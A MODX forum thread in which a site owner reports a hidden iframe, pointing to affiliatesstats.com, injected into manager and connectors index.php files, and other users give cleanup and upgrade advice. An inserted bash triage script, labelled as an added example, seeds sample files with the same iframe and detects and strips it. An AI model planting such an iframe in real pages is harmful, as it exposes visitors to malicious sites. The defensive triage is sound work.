    Hi all,

    One of our sites has unfortunately been hacked. The manager/index.php file was altered on the 16/11/13. The Front End is still up and running from what I can see.

    Our client couldn't access the manager. So I checked the manager/index.php file and saw the following code at the very end of the file:
    <iframe src="http://affiliatesstats.com/in.cgi?4" width="10" height="10" style="visibility:hidden;position:absolute;left:0;  top:0;"></iframe>


    I deleted that code, and I thought that would be it, but unfortunately, the manager is only a quarter of the way working. See attached screenshot.


    • None of the buttons in the manager are working
    • The file permission for manager/index.php is 644. Is that right?
    • From what I can see, no other files have been touched, although a lot of them have the same modified date of 16/11/13. Only the manager/index.php file was changed.
    • MODX Version: Revolution 2.1.3-pl (traditional)

    Anybody else see something obvious I can do?

    Regards,
    Sar [ed. note: insightdesign last edited this post 10 years, 5 months ago.]
    • I would upgrade. Actually delete the entire manager directory and replace it with the new one. Make sure any file that shows the recent modification date is removed and replaced. Make sure your core/config/config.inc.php file is clean, as well as the three config.core.php files (root, manager and connectors).

      If this is on shared or otherwise managed hosting, talk to your tech support. They possibly got into your site with the Manager user's password restore bug, which was fixed a few versions ago. Sign up for the security feed or newsletter and keep your sites updated. Or possibly the entire server was compromised, in which case you won't be the only one hosted on that server with problems.

        Studying MODX in the desert - http://sottwell.com
        Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
        Join the Slack Community - http://modx.org
        Quote from: sottwell at Nov 20, 2013, 04:58 AM
        I would upgrade. Actually delete the entire manager directory and replace it with the new one. Make sure any file that shows the recent modification date is removed and replaced. Make sure your core/config/config.inc.php file is clean, as well as the three config.core.php files (root, manager and connectors).

        If this is on shared or otherwise managed hosting, talk to your tech support. They possibly got into your site with the Manager user's password restore bug, which was fixed a few versions ago. Sign up for the security feed or newsletter and keep your sites updated. Or possibly the entire server was compromised, in which case you won't be the only one hosted on that server with problems.


        We will strongly suggest to the client that they upgrade.

        I went into the connectors/index.php file (I missed that one in my earlier search) and deleted the injected code and now the menu on the left hand side comes up (see screenshot) but none of the information comes up EXCEPT for the files.

        So, anyway, what do you think the hackers are expecting to get out of this? Are they assuming the index file is an HTML file? Because obviously the index.php file stopped working due to the random <iframe> code.
        • Usually putting iframes into index.whatever files will cause the page to have the iframe when viewed. These are usually linked to malicious sites, or spam-links sites. The oddity of infecting the manager and connector index.php files could be explained by this being some kind of automated script, just looking for index.whatever files. That is why I'd be suspicious of some script actually having been uploaded to the server, in which case it'll just do it again.
            Studying MODX in the desert - http://sottwell.com
            Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
            Join the Slack Community - http://modx.org
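            The two pieces of advice above (look for files with the recent modification date, and expect the injection in more than just one index.php, possibly with a dropper still on the server) translate into a quick triage script. The following is an added example written for this thread, not code from the original posts or from MODX: it builds a constructed throw-away webroot with two infected index.php files, lists every PHP/HTML file carrying a hidden iframe, lists files modified inside the incident window, and strips the tag while keeping a copy outside the webroot. The paths, dates and file contents are made up for the demo; the iframe host is the one the poster reported.

```bash
#!/usr/bin/env bash
# Added example (not from the thread or from MODX): triage a webroot for the
# hidden <iframe> injection described above and list files touched in the
# incident window. The sample webroot built below is constructed for the demo.
set -u

# Loose pattern: any <iframe ...> carrying visibility:hidden, whatever the host.
# The thread's sample points at affiliatesstats.com, but bots rotate domains.
IFRAME_RE='<iframe[^>]*visibility:hidden[^>]*>[[:space:]]*</iframe>'

# Build a throw-away webroot: infected manager/index.php, an infected dormant
# copy, a clean front-end index.php, a clean connector and a clean config file.
make_sample_root() {
  root=$(mktemp -d)
  mkdir -p "$root/manager" "$root/connectors" "$root/old-site/manager" "$root/core/config"
  printf '<?php\ndefine("MODX_API_MODE", false);\nrequire_once "index.php";\n' > "$root/index.php"
  printf '<?php\nrequire_once dirname(__FILE__)."/config.core.php";\n?><iframe src="http://affiliatesstats.com/in.cgi?4" width="10" height="10" style="visibility:hidden;position:absolute;left:0;  top:0;"></iframe>\n' > "$root/manager/index.php"
  cp "$root/manager/index.php" "$root/old-site/manager/index.php"
  printf '<?php\n$database_type = "mysql";\n' > "$root/core/config/config.inc.php"
  printf '<?php\n// connector entry point\n' > "$root/connectors/index.php"
  # Constructed timestamps: everything older, infected files stamped 16/11/13.
  find "$root" -type f -exec touch -t 201310010000 {} +
  touch -t 201311161530 "$root/manager/index.php" "$root/old-site/manager/index.php"
  echo "$root"
}

# PHP/HTML files carrying the hidden iframe. Deliberately not limited to
# index.php: the thread shows manager and connectors hit, and dormant copies.
find_injected() {
  find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
    -exec grep -l -E "$IFRAME_RE" {} + 2>/dev/null | sort
}

count_injected() { find_injected "$1" | awk 'END { print NR }'; }

# Files modified after $2 and not after $3 (touch -t stamps, POSIX find -newer).
# Caveat: an attacker can reset mtimes, so treat this as a hint, not proof.
modified_between() {
  local root=$1 start=$2 end=$3 lo hi
  lo=$(mktemp) && hi=$(mktemp)
  touch -t "$start" "$lo"
  touch -t "$end" "$hi"
  find "$root" -type f -newer "$lo" ! -newer "$hi" | sort
  rm -f "$lo" "$hi"
}

# Strip the iframe in place, keeping the original in a quarantine directory
# OUTSIDE the webroot: a .bak beside index.php would be served as plain text.
strip_injected() {
  local file=$1 quarantine=$2 saved
  mkdir -p "$quarantine"
  saved="$quarantine/$(printf '%s' "$file" | tr '/' '_')"
  cp -p "$file" "$saved"
  # Redirecting onto the existing file keeps its mode (e.g. 644).
  sed -E "s#${IFRAME_RE}##g" "$saved" > "$file"
}

demo() {
  local root quarantine f
  root=$(make_sample_root)
  quarantine=$(mktemp -d)
  echo "== files carrying a hidden iframe"; find_injected "$root"
  echo "== files modified on 16/11/13";    modified_between "$root" 201311160000 201311170000
  for f in $(find_injected "$root"); do strip_injected "$f" "$quarantine"; done
  echo "== remaining after cleanup: $(count_injected "$root") (originals kept in $quarantine)"
}

if [ "${1:-}" = demo ]; then demo; fi
```

            Run it as `bash triage.sh demo` to see it against the constructed webroot; against a real site, point `find_injected` and `modified_between` at the document root and run as the site's own user. The grep only finds this payload, not whatever uploaded it, so the list of recently modified files matters more than the cleanup: anything in that list that is not part of a fresh MODX release is a candidate dropper, and the reinstall and password rotation recommended in the thread are still the real fix.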
            As Sottwell suggests, an upgrade would be number 1. There have been quite a few new releases since then, also regarding security issues.
            Regarding your question
            So, anyway, what do you think the hackers are expecting to get out of this?
            It's quite simple: the iframe somehow contains malicious software that will attack the browser of the visitor. Or maybe a keylogger which will get all the keystrokes you, or your users, make while logging in.

            The way you describe the problem looks like a scanner injecting all index.php files. That points to a complete compromise of your account, or maybe even complete server (if shared).

            It might be me, but I wouldn't trust anything anymore. If the site is of reasonable size I would opt for complete reinstall.
            Just create a new install on, for instance, a test domain, and recreate the site with only the newest release & packages.
            Then copy content, images, javascript & css to new site. If all's running well again replace the "old" site with the updated one completely.
            Also change ALL passwords granted to users, moderators, ftp, sql, accountpanel etc...
            That way you have a clean install again.

            Just my 2 cents...
            Good luck!
              Addict since 2012....
              Quote from: sottwell at Nov 20, 2013, 08:45 AM
              Usually putting iframes into index.whatever files will cause the page to have the iframe when viewed. These are usually linked to malicious sites, or spam-links sites. The oddity of infecting the manager and connector index.php files could be explained by this being some kind of automated script, just looking for index.whatever files. That is why I'd be suspicious of some script actually having been uploaded to the server, in which case it'll just do it again.

              Yeah. The bot injected that iframe into every single index.php file. I even had a couple dormant/offline MODx folders on the server affected.

              Quote from: mintnl at Nov 20, 2013, 03:01 PM
              As Sottwell suggests, an upgrade would be number 1. There have been quite a few new releases since then, also regarding security issues.
              Regarding your question
              So, anyway, what do you think the hackers are expecting to get out of this?
              It's quite simple: the iframe somehow contains malicious software that will attack the browser of the visitor. Or maybe a keylogger which will get all the keystrokes you, or your users, make while logging in.

              The way you describe the problem looks like a scanner injecting all index.php files. That points to a complete compromise of your account, or maybe even complete server (if shared).

              It might be me, but I wouldn't trust anything anymore. If the site is of reasonable size I would opt for complete reinstall.
              Just create a new install on, for instance, a test domain, and recreate the site with only the newest release & packages.
              Then copy content, images, javascript & css to new site. If all's running well again replace the "old" site with the updated one completely.
              Also change ALL passwords granted to users, moderators, ftp, sql, accountpanel etc...
              That way you have a clean install again.

              Just my 2 cents...
              Good luck!

              I don't think the server has been infected since our two other sites on the same server are okay. I most certainly will suggest an upgrade for all of our clients. Thanks for your two cents!

              Sar